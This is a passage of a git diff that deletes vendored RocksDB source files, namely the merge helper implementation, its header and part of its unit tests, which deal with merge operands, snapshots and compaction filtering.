-#include "db/dbformat.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/merge_operator.h"
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-MergeHelper::MergeHelper(Env* env, const Comparator* user_comparator,
-                         const MergeOperator* user_merge_operator,
-                         const CompactionFilter* compaction_filter,
-                         Logger* logger, bool assert_valid_internal_key,
-                         SequenceNumber latest_snapshot, int level,
-                         Statistics* stats,
-                         const std::atomic<bool>* shutting_down)
-    : env_(env),
-      user_comparator_(user_comparator),
-      user_merge_operator_(user_merge_operator),
-      compaction_filter_(compaction_filter),
-      shutting_down_(shutting_down),
-      logger_(logger),
-      assert_valid_internal_key_(assert_valid_internal_key),
-      allow_single_operand_(false),
-      latest_snapshot_(latest_snapshot),
-      level_(level),
-      keys_(),
-      filter_timer_(env_),
-      total_filter_time_(0U),
-      stats_(stats) {
-  assert(user_comparator_ != nullptr);
-  if (user_merge_operator_) {
-    allow_single_operand_ = user_merge_operator_->AllowSingleOperand();
-  }
-}
-
-Status MergeHelper::TimedFullMerge(const MergeOperator* merge_operator,
-                                   const Slice& key, const Slice* value,
-                                   const std::vector<Slice>& operands,
-                                   std::string* result, Logger* logger,
-                                   Statistics* statistics, Env* env,
-                                   Slice* result_operand,
-                                   bool update_num_ops_stats) {
-  assert(merge_operator != nullptr);
-
-  if (operands.size() == 0) {
-    assert(value != nullptr && result != nullptr);
-    result->assign(value->data(), value->size());
-    return Status::OK();
-  }
-
-  if (update_num_ops_stats) {
-    MeasureTime(statistics, READ_NUM_MERGE_OPERANDS,
-                static_cast<uint64_t>(operands.size()));
-  }
-
-  bool success;
-  Slice tmp_result_operand(nullptr, 0);
-  const MergeOperator::MergeOperationInput merge_in(key, value, operands,
-                                                    logger);
-  MergeOperator::MergeOperationOutput merge_out(*result, tmp_result_operand);
-  {
-    // Setup to time the merge
-    StopWatchNano timer(env, statistics != nullptr);
-    PERF_TIMER_GUARD(merge_operator_time_nanos);
-
-    // Do the merge
-    success = merge_operator->FullMergeV2(merge_in, &merge_out);
-
-    if (tmp_result_operand.data()) {
-      // FullMergeV2 result is an existing operand
-      if (result_operand != nullptr) {
-        *result_operand = tmp_result_operand;
-      } else {
-        result->assign(tmp_result_operand.data(), tmp_result_operand.size());
-      }
-    } else if (result_operand) {
-      *result_operand = Slice(nullptr, 0);
-    }
-
-    RecordTick(statistics, MERGE_OPERATION_TOTAL_TIME,
-               statistics ? timer.ElapsedNanos() : 0);
-  }
-
-  if (!success) {
-    RecordTick(statistics, NUMBER_MERGE_FAILURES);
-    return Status::Corruption("Error: Could not perform merge.");
-  }
-
-  return Status::OK();
-}
-
-// PRE:  iter points to the first merge type entry
-// POST: iter points to the first entry beyond the merge process (or the end)
-//       keys_, operands_ are updated to reflect the merge result.
-//       keys_ stores the list of keys encountered while merging.
-//       operands_ stores the list of merge operands encountered while merging.
-//       keys_[i] corresponds to operands_[i] for each i.
-Status MergeHelper::MergeUntil(InternalIterator* iter,
-                               RangeDelAggregator* range_del_agg,
-                               const SequenceNumber stop_before,
-                               const bool at_bottom) {
-  // Get a copy of the internal key, before it's invalidated by iter->Next()
-  // Also maintain the list of merge operands seen.
-  assert(HasOperator());
-  keys_.clear();
-  merge_context_.Clear();
-  has_compaction_filter_skip_until_ = false;
-  assert(user_merge_operator_);
-  bool first_key = true;
-
-  // We need to parse the internal key again as the parsed key is
-  // backed by the internal key!
-  // Assume no internal key corruption as it has been successfully parsed
-  // by the caller.
-  // original_key_is_iter variable is just caching the information:
-  // original_key_is_iter == (iter->key().ToString() == original_key)
-  bool original_key_is_iter = true;
-  std::string original_key = iter->key().ToString();
-  // Important:
-  // orig_ikey is backed by original_key if keys_.empty()
-  // orig_ikey is backed by keys_.back() if !keys_.empty()
-  ParsedInternalKey orig_ikey;
-  ParseInternalKey(original_key, &orig_ikey);
-
-  Status s;
-  bool hit_the_next_user_key = false;
-  for (; iter->Valid(); iter->Next(), original_key_is_iter = false) {
-    if (IsShuttingDown()) {
-      return Status::ShutdownInProgress();
-    }
-
-    ParsedInternalKey ikey;
-    assert(keys_.size() == merge_context_.GetNumOperands());
-
-    if (!ParseInternalKey(iter->key(), &ikey)) {
-      // stop at corrupted key
-      if (assert_valid_internal_key_) {
-        assert(!"Corrupted internal key not expected.");
-        return Status::Corruption("Corrupted internal key not expected.");
-      }
-      break;
-    } else if (first_key) {
-      assert(user_comparator_->Equal(ikey.user_key, orig_ikey.user_key));
-      first_key = false;
-    } else if (!user_comparator_->Equal(ikey.user_key, orig_ikey.user_key)) {
-      // hit a different user key, stop right here
-      hit_the_next_user_key = true;
-      break;
-    } else if (stop_before && ikey.sequence <= stop_before) {
-      // hit an entry that's visible by the previous snapshot, can't touch that
-      break;
-    }
-
-    // At this point we are guaranteed that we need to process this key.
-
-    assert(IsValueType(ikey.type));
-    if (ikey.type != kTypeMerge) {
-
-      // hit a put/delete/single delete
-      //   => merge the put value or a nullptr with operands_
-      //   => store result in operands_.back() (and update keys_.back())
-      //   => change the entry type to kTypeValue for keys_.back()
-      // We are done! Success!
-
-      // If there are no operands, just return the Status::OK(). That will cause
-      // the compaction iterator to write out the key we're currently at, which
-      // is the put/delete we just encountered.
-      if (keys_.empty()) {
-        return Status::OK();
-      }
-
-      // TODO(noetzli) If the merge operator returns false, we are currently
-      // (almost) silently dropping the put/delete. That's probably not what we
-      // want. Also if we're in compaction and it's a put, it would be nice to
-      // run compaction filter on it.
-      const Slice val = iter->value();
-      const Slice* val_ptr = (kTypeValue == ikey.type) ? &val : nullptr;
-      std::string merge_result;
-      s = TimedFullMerge(user_merge_operator_, ikey.user_key, val_ptr,
-                         merge_context_.GetOperands(), &merge_result, logger_,
-                         stats_, env_);
-
-      // We store the result in keys_.back() and operands_.back()
-      // if nothing went wrong (i.e.: no operand corruption on disk)
-      if (s.ok()) {
-        // The original key encountered
-        original_key = std::move(keys_.back());
-        orig_ikey.type = kTypeValue;
-        UpdateInternalKey(&original_key, orig_ikey.sequence, orig_ikey.type);
-        keys_.clear();
-        merge_context_.Clear();
-        keys_.emplace_front(std::move(original_key));
-        merge_context_.PushOperand(merge_result);
-      }
-
-      // move iter to the next entry
-      iter->Next();
-      return s;
-    } else {
-      // hit a merge
-      //   => if there is a compaction filter, apply it.
-      //   => check for range tombstones covering the operand
-      //   => merge the operand into the front of the operands_ list
-      //      if not filtered
-      //   => then continue because we haven't yet seen a Put/Delete.
-      //
-      // Keep queuing keys and operands until we either meet a put / delete
-      // request or later did a partial merge.
-
-      Slice value_slice = iter->value();
-      // add an operand to the list if:
-      // 1) it's included in one of the snapshots. in that case we *must* write
-      // it out, no matter what compaction filter says
-      // 2) it's not filtered by a compaction filter
-      CompactionFilter::Decision filter =
-          ikey.sequence <= latest_snapshot_
-              ? CompactionFilter::Decision::kKeep
-              : FilterMerge(orig_ikey.user_key, value_slice);
-      if (filter != CompactionFilter::Decision::kRemoveAndSkipUntil &&
-          range_del_agg != nullptr &&
-          range_del_agg->ShouldDelete(
-              iter->key(),
-              RangeDelAggregator::RangePositioningMode::kForwardTraversal)) {
-        filter = CompactionFilter::Decision::kRemove;
-      }
-      if (filter == CompactionFilter::Decision::kKeep ||
-          filter == CompactionFilter::Decision::kChangeValue) {
-        if (original_key_is_iter) {
-          // this is just an optimization that saves us one memcpy
-          keys_.push_front(std::move(original_key));
-        } else {
-          keys_.push_front(iter->key().ToString());
-        }
-        if (keys_.size() == 1) {
-          // we need to re-anchor the orig_ikey because it was anchored by
-          // original_key before
-          ParseInternalKey(keys_.back(), &orig_ikey);
-        }
-        if (filter == CompactionFilter::Decision::kKeep) {
-          merge_context_.PushOperand(
-              value_slice, iter->IsValuePinned() /* operand_pinned */);
-        } else {  // kChangeValue
-          // Compaction filter asked us to change the operand from value_slice
-          // to compaction_filter_value_.
-          merge_context_.PushOperand(compaction_filter_value_, false);
-        }
-      } else if (filter == CompactionFilter::Decision::kRemoveAndSkipUntil) {
-        // Compaction filter asked us to remove this key altogether
-        // (not just this operand), along with some keys following it.
-        keys_.clear();
-        merge_context_.Clear();
-        has_compaction_filter_skip_until_ = true;
-        return Status::OK();
-      }
-    }
-  }
-
-  if (merge_context_.GetNumOperands() == 0) {
-    // we filtered out all the merge operands
-    return Status::OK();
-  }
-
-  // We are sure we have seen this key's entire history if we are at the
-  // last level and exhausted all internal keys of this user key.
-  // NOTE: !iter->Valid() does not necessarily mean we hit the
-  // beginning of a user key, as versions of a user key might be
-  // split into multiple files (even files on the same level)
-  // and some files might not be included in the compaction/merge.
-  //
-  // There are also cases where we have seen the root of history of this
-  // key without being sure of it. Then, we simply miss the opportunity
-  // to combine the keys. Since VersionSet::SetupOtherInputs() always makes
-  // sure that all merge-operands on the same level get compacted together,
-  // this will simply lead to these merge operands moving to the next level.
-  //
-  // So, we only perform the following logic (to merge all operands together
-  // without a Put/Delete) if we are certain that we have seen the end of key.
-  bool surely_seen_the_beginning = hit_the_next_user_key && at_bottom;
-  if (surely_seen_the_beginning) {
-    // do a final merge with nullptr as the existing value and say
-    // bye to the merge type (it's now converted to a Put)
-    assert(kTypeMerge == orig_ikey.type);
-    assert(merge_context_.GetNumOperands() >= 1);
-    assert(merge_context_.GetNumOperands() == keys_.size());
-    std::string merge_result;
-    s = TimedFullMerge(user_merge_operator_, orig_ikey.user_key, nullptr,
-                       merge_context_.GetOperands(), &merge_result, logger_,
-                       stats_, env_);
-    if (s.ok()) {
-      // The original key encountered
-      // We are certain that keys_ is not empty here (see assertions couple of
-      // lines before).
-      original_key = std::move(keys_.back());
-      orig_ikey.type = kTypeValue;
-      UpdateInternalKey(&original_key, orig_ikey.sequence, orig_ikey.type);
-      keys_.clear();
-      merge_context_.Clear();
-      keys_.emplace_front(std::move(original_key));
-      merge_context_.PushOperand(merge_result);
-    }
-  } else {
-    // We haven't seen the beginning of the key nor a Put/Delete.
-    // Attempt to use the user's associative merge function to
-    // merge the stacked merge operands into a single operand.
-    s = Status::MergeInProgress();
-    if (merge_context_.GetNumOperands() >= 2 ||
-        (allow_single_operand_ && merge_context_.GetNumOperands() == 1)) {
-      bool merge_success = false;
-      std::string merge_result;
-      {
-        StopWatchNano timer(env_, stats_ != nullptr);
-        PERF_TIMER_GUARD(merge_operator_time_nanos);
-        merge_success = user_merge_operator_->PartialMergeMulti(
-            orig_ikey.user_key,
-            std::deque<Slice>(merge_context_.GetOperands().begin(),
-                              merge_context_.GetOperands().end()),
-            &merge_result, logger_);
-        RecordTick(stats_, MERGE_OPERATION_TOTAL_TIME,
-                   stats_ ? timer.ElapsedNanosSafe() : 0);
-      }
-      if (merge_success) {
-        // Merging of operands (associative merge) was successful.
-        // Replace operands with the merge result
-        merge_context_.Clear();
-        merge_context_.PushOperand(merge_result);
-        keys_.erase(keys_.begin(), keys_.end() - 1);
-      }
-    }
-  }
-
-  return s;
-}
-
-MergeOutputIterator::MergeOutputIterator(const MergeHelper* merge_helper)
-    : merge_helper_(merge_helper) {
-  it_keys_ = merge_helper_->keys().rend();
-  it_values_ = merge_helper_->values().rend();
-}
-
-void MergeOutputIterator::SeekToFirst() {
-  const auto& keys = merge_helper_->keys();
-  const auto& values = merge_helper_->values();
-  assert(keys.size() == values.size());
-  it_keys_ = keys.rbegin();
-  it_values_ = values.rbegin();
-}
-
-void MergeOutputIterator::Next() {
-  ++it_keys_;
-  ++it_values_;
-}
-
-CompactionFilter::Decision MergeHelper::FilterMerge(const Slice& user_key,
-                                                    const Slice& value_slice) {
-  if (compaction_filter_ == nullptr) {
-    return CompactionFilter::Decision::kKeep;
-  }
-  if (stats_ != nullptr) {
-    filter_timer_.Start();
-  }
-  compaction_filter_value_.clear();
-  compaction_filter_skip_until_.Clear();
-  auto ret = compaction_filter_->FilterV2(
-      level_, user_key, CompactionFilter::ValueType::kMergeOperand, value_slice,
-      &compaction_filter_value_, compaction_filter_skip_until_.rep());
-  if (ret == CompactionFilter::Decision::kRemoveAndSkipUntil) {
-    if (user_comparator_->Compare(*compaction_filter_skip_until_.rep(),
-                                  user_key) <= 0) {
-      // Invalid skip_until returned from compaction filter.
-      // Keep the key as per FilterV2 documentation.
-      ret = CompactionFilter::Decision::kKeep;
-    } else {
-      compaction_filter_skip_until_.ConvertFromUserKey(kMaxSequenceNumber,
-                                                       kValueTypeForSeek);
-    }
-  }
-  total_filter_time_ += filter_timer_.ElapsedNanosSafe();
-  return ret;
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/merge_helper.h b/thirdparty/rocksdb/db/merge_helper.h
deleted file mode 100644
index b9ef12a..0000000
--- a/thirdparty/rocksdb/db/merge_helper.h
+++ /dev/null
@@ -1,195 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef MERGE_HELPER_H
-#define MERGE_HELPER_H
-
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-class Comparator;
-class Iterator;
-class Logger;
-class MergeOperator;
-class Statistics;
-class InternalIterator;
-
-class MergeHelper {
- public:
-  MergeHelper(Env* env, const Comparator* user_comparator,
-              const MergeOperator* user_merge_operator,
-              const CompactionFilter* compaction_filter, Logger* logger,
-              bool assert_valid_internal_key, SequenceNumber latest_snapshot,
-              int level = 0, Statistics* stats = nullptr,
-              const std::atomic<bool>* shutting_down = nullptr);
-
-  // Wrapper around MergeOperator::FullMergeV2() that records perf statistics.
-  // Result of merge will be written to result if status returned is OK.
-  // If operands is empty, the value will simply be copied to result.
-  // Set `update_num_ops_stats` to true if it is from a user read, so that
-  // the latency is sensitive.
-  // Returns one of the following statuses:
-  // - OK: Entries were successfully merged.
-  // - Corruption: Merge operator reported unsuccessful merge.
-  static Status TimedFullMerge(const MergeOperator* merge_operator,
-                               const Slice& key, const Slice* value,
-                               const std::vector<Slice>& operands,
-                               std::string* result, Logger* logger,
-                               Statistics* statistics, Env* env,
-                               Slice* result_operand = nullptr,
-                               bool update_num_ops_stats = false);
-
-  // Merge entries until we hit
-  //     - a corrupted key
-  //     - a Put/Delete,
-  //     - a different user key,
-  //     - a specific sequence number (snapshot boundary),
-  //     - REMOVE_AND_SKIP_UNTIL returned from compaction filter,
-  //  or - the end of iteration
-  // iter: (IN)  points to the first merge type entry
-  //       (OUT) points to the first entry not included in the merge process
-  // range_del_agg: (IN) filters merge operands covered by range tombstones.
-  // stop_before: (IN) a sequence number that merge should not cross.
-  //                   0 means no restriction
-  // at_bottom:   (IN) true if the iterator covers the bottem level, which means
-  //                   we could reach the start of the history of this user key.
-  //
-  // Returns one of the following statuses:
-  // - OK: Entries were successfully merged.
-  // - MergeInProgress: Put/Delete not encountered, and didn't reach the start
-  //   of key's history. Output consists of merge operands only.
-  // - Corruption: Merge operator reported unsuccessful merge or a corrupted
-  //   key has been encountered and not expected (applies only when compiling
-  //   with asserts removed).
-  // - ShutdownInProgress: interrupted by shutdown (*shutting_down == true).
-  //
-  // REQUIRED: The first key in the input is not corrupted.
-  Status MergeUntil(InternalIterator* iter,
-                    RangeDelAggregator* range_del_agg = nullptr,
-                    const SequenceNumber stop_before = 0,
-                    const bool at_bottom = false);
-
-  // Filters a merge operand using the compaction filter specified
-  // in the constructor. Returns the decision that the filter made.
-  // Uses compaction_filter_value_ and compaction_filter_skip_until_ for the
-  // optional outputs of compaction filter.
-  CompactionFilter::Decision FilterMerge(const Slice& user_key,
-                                         const Slice& value_slice);
-
-  // Query the merge result
-  // These are valid until the next MergeUntil call
-  // If the merging was successful:
-  //   - keys() contains a single element with the latest sequence number of
-  //     the merges. The type will be Put or Merge. See IMPORTANT 1 note, below.
-  //   - values() contains a single element with the result of merging all the
-  //     operands together
-  //
-  //   IMPORTANT 1: the key type could change after the MergeUntil call.
-  //        Put/Delete + Merge + ... + Merge => Put
-  //        Merge + ... + Merge => Merge
-  //
-  // If the merge operator is not associative, and if a Put/Delete is not found
-  // then the merging will be unsuccessful. In this case:
-  //   - keys() contains the list of internal keys seen in order of iteration.
-  //   - values() contains the list of values (merges) seen in the same order.
-  //              values() is parallel to keys() so that the first entry in
-  //              keys() is the key associated with the first entry in values()
-  //              and so on. These lists will be the same length.
-  //              All of these pairs will be merges over the same user key.
-  //              See IMPORTANT 2 note below.
-  //
-  //   IMPORTANT 2: The entries were traversed in order from BACK to FRONT.
-  //                So keys().back() was the first key seen by iterator.
-  // TODO: Re-style this comment to be like the first one
-  const std::deque<std::string>& keys() const { return keys_; }
-  const std::vector<Slice>& values() const {
-    return merge_context_.GetOperands();
-  }
-  uint64_t TotalFilterTime() const { return total_filter_time_; }
-  bool HasOperator() const { return user_merge_operator_ != nullptr; }
-
-  // If compaction filter returned REMOVE_AND_SKIP_UNTIL, this method will
-  // return true and fill *until with the key to which we should skip.
-  // If true, keys() and values() are empty.
-  bool FilteredUntil(Slice* skip_until) const {
-    if (!has_compaction_filter_skip_until_) {
-      return false;
-    }
-    assert(compaction_filter_ != nullptr);
-    assert(skip_until != nullptr);
-    assert(compaction_filter_skip_until_.Valid());
-    *skip_until = compaction_filter_skip_until_.Encode();
-    return true;
-  }
-
- private:
-  Env* env_;
-  const Comparator* user_comparator_;
-  const MergeOperator* user_merge_operator_;
-  const CompactionFilter* compaction_filter_;
-  const std::atomic<bool>* shutting_down_;
-  Logger* logger_;
-  bool assert_valid_internal_key_; // enforce no internal key corruption?
-  bool allow_single_operand_;
-  SequenceNumber latest_snapshot_;
-  int level_;
-
-  // the scratch area that holds the result of MergeUntil
-  // valid up to the next MergeUntil call
-
-  // Keeps track of the sequence of keys seen
-  std::deque<std::string> keys_;
-  // Parallel with keys_; stores the operands
-  mutable MergeContext merge_context_;
-
-  StopWatchNano filter_timer_;
-  uint64_t total_filter_time_;
-  Statistics* stats_;
-
-  bool has_compaction_filter_skip_until_ = false;
-  std::string compaction_filter_value_;
-  InternalKey compaction_filter_skip_until_;
-
-  bool IsShuttingDown() {
-    // This is a best-effort facility, so memory_order_relaxed is sufficient.
-    return shutting_down_ && shutting_down_->load(std::memory_order_relaxed);
-  }
-};
-
-// MergeOutputIterator can be used to iterate over the result of a merge.
-class MergeOutputIterator {
- public:
-  // The MergeOutputIterator is bound to a MergeHelper instance.
-  explicit MergeOutputIterator(const MergeHelper* merge_helper);
-
-  // Seeks to the first record in the output.
-  void SeekToFirst();
-  // Advances to the next record in the output.
-  void Next();
-
-  Slice key() { return Slice(*it_keys_); }
-  Slice value() { return Slice(*it_values_); }
-  bool Valid() { return it_keys_ != merge_helper_->keys().rend(); }
-
- private:
-  const MergeHelper* merge_helper_;
-  std::deque<std::string>::const_reverse_iterator it_keys_;
-  std::vector<Slice>::const_reverse_iterator it_values_;
-};
-
-} // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/db/merge_helper_test.cc b/thirdparty/rocksdb/db/merge_helper_test.cc
deleted file mode 100644
index dc43db0..0000000
--- a/thirdparty/rocksdb/db/merge_helper_test.cc
+++ /dev/null
@@ -1,290 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/merge_helper.h"
-#include "rocksdb/comparator.h"
-#include "util/coding.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class MergeHelperTest : public testing::Test {
- public:
-  MergeHelperTest() { env_ = Env::Default(); }
-
-  ~MergeHelperTest() = default;
-
-  Status Run(SequenceNumber stop_before, bool at_bottom,
-             SequenceNumber latest_snapshot = 0) {
-    iter_.reset(new test::VectorIterator(ks_, vs_));
-    iter_->SeekToFirst();
-    merge_helper_.reset(new MergeHelper(env_, BytewiseComparator(),
-                                        merge_op_.get(), filter_.get(), nullptr,
-                                        false, latest_snapshot));
-    return merge_helper_->MergeUntil(iter_.get(), nullptr /* range_del_agg */,
-                                     stop_before, at_bottom);
-  }
-
-  void AddKeyVal(const std::string& user_key, const SequenceNumber& seq,
-                 const ValueType& t, const std::string& val,
-                 bool corrupt = false) {
-    InternalKey ikey(user_key, seq, t);
-    if (corrupt) {
-      test::CorruptKeyType(&ikey);
-    }
-    ks_.push_back(ikey.Encode().ToString());
-    vs_.push_back(val);
-  }
-
-  Env* env_;
-  std::unique_ptr<test::VectorIterator> iter_;
-  std::shared_ptr<MergeOperator> merge_op_;
-  std::unique_ptr<MergeHelper> merge_helper_;
-  std::vector<std::string> ks_;
-  std::vector<std::string> vs_;
-  std::unique_ptr<test::FilterNumber> filter_;
-};
-
-// If MergeHelper encounters a new key on the last level, we know that
-// the key has no more history and it can merge keys.
-TEST_F(MergeHelperTest, MergeAtBottomSuccess) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 20, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 10, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("b", 10, kTypeMerge, test::EncodeInt(4U));  // <- iter_ after merge
-
-  ASSERT_TRUE(Run(0, true).ok());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 20, kTypeValue), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(4U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// Merging with a value results in a successful merge.
-TEST_F(MergeHelperTest, MergeValue) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 40, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 20, kTypeValue, test::EncodeInt(4U));  // <- iter_ after merge
-  AddKeyVal("a", 10, kTypeMerge, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(0, false).ok());
-  ASSERT_EQ(ks_[3], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 40, kTypeValue), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(8U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// Merging stops before a snapshot.
-TEST_F(MergeHelperTest, SnapshotBeforeValue) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 50, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 40, kTypeMerge, test::EncodeInt(3U));  // <- iter_ after merge
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 20, kTypeValue, test::EncodeInt(4U));
-  AddKeyVal("a", 10, kTypeMerge, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(31, true).IsMergeInProgress());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(4U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// MergeHelper preserves the operand stack for merge operators that
-// cannot do a partial merge.
-TEST_F(MergeHelperTest, NoPartialMerge) {
-  merge_op_ = MergeOperators::CreateStringAppendTESTOperator();
-
-  AddKeyVal("a", 50, kTypeMerge, "v2");
-  AddKeyVal("a", 40, kTypeMerge, "v");  // <- iter_ after merge
-  AddKeyVal("a", 30, kTypeMerge, "v");
-
-  ASSERT_TRUE(Run(31, true).IsMergeInProgress());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 40, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ("v", merge_helper_->values()[0]);
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), merge_helper_->keys()[1]);
-  ASSERT_EQ("v2", merge_helper_->values()[1]);
-  ASSERT_EQ(2U, merge_helper_->keys().size());
-  ASSERT_EQ(2U, merge_helper_->values().size());
-}
-
-// A single operand can not be merged.
-TEST_F(MergeHelperTest, SingleOperand) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 50, kTypeMerge, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(31, true).IsMergeInProgress());
-  ASSERT_FALSE(iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(1U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// Merging with a deletion turns the deletion into a value
-TEST_F(MergeHelperTest, MergeDeletion) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 20, kTypeDeletion, "");
-
-  ASSERT_TRUE(Run(15, false).ok());
-  ASSERT_FALSE(iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 30, kTypeValue), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(3U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// The merge helper stops upon encountering a corrupt key
-TEST_F(MergeHelperTest, CorruptKey) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(1U));
-  // Corrupt key
-  AddKeyVal("a", 20, kTypeDeletion, "", true);  // <- iter_ after merge
-
-  ASSERT_TRUE(Run(15, false).IsMergeInProgress());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 30, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(4U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// The compaction filter is called on every merge operand
-TEST_F(MergeHelperTest, FilterMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 25, kTypeValue, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(15, false).ok());
-  ASSERT_FALSE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  ASSERT_EQ(test::KeyStr("a", 30, kTypeValue),
-            merge_output_iter.key().ToString());
-  ASSERT_EQ(test::EncodeInt(8U), merge_output_iter.value().ToString());
-  merge_output_iter.Next();
-  ASSERT_FALSE(merge_output_iter.Valid());
-}
-
-TEST_F(MergeHelperTest, FilterAllMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(5U));
-
-  // filtered out all
-  ASSERT_TRUE(Run(15, false).ok());
-  ASSERT_FALSE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  ASSERT_FALSE(merge_output_iter.Valid());
-
-  // we have one operand that will survive because it's a delete
-  AddKeyVal("a", 24, kTypeDeletion, test::EncodeInt(5U));
-  AddKeyVal("b", 23, kTypeValue, test::EncodeInt(5U));
-  ASSERT_TRUE(Run(15, true).ok());
-  merge_output_iter = MergeOutputIterator(merge_helper_.get());
-  ASSERT_TRUE(iter_->Valid());
-  merge_output_iter.SeekToFirst();
-  ASSERT_FALSE(merge_output_iter.Valid());
-
-  // when all merge operands are filtered out, we leave the iterator pointing to
-  // the Put/Delete that survived
-  ASSERT_EQ(test::KeyStr("a", 24, kTypeDeletion), iter_->key().ToString());
-  ASSERT_EQ(test::EncodeInt(5U), iter_->value().ToString());
-}
-
-// Make sure that merge operands are filtered at the beginning
-TEST_F(MergeHelperTest, FilterFirstMergeOperand) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 31, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(2U));
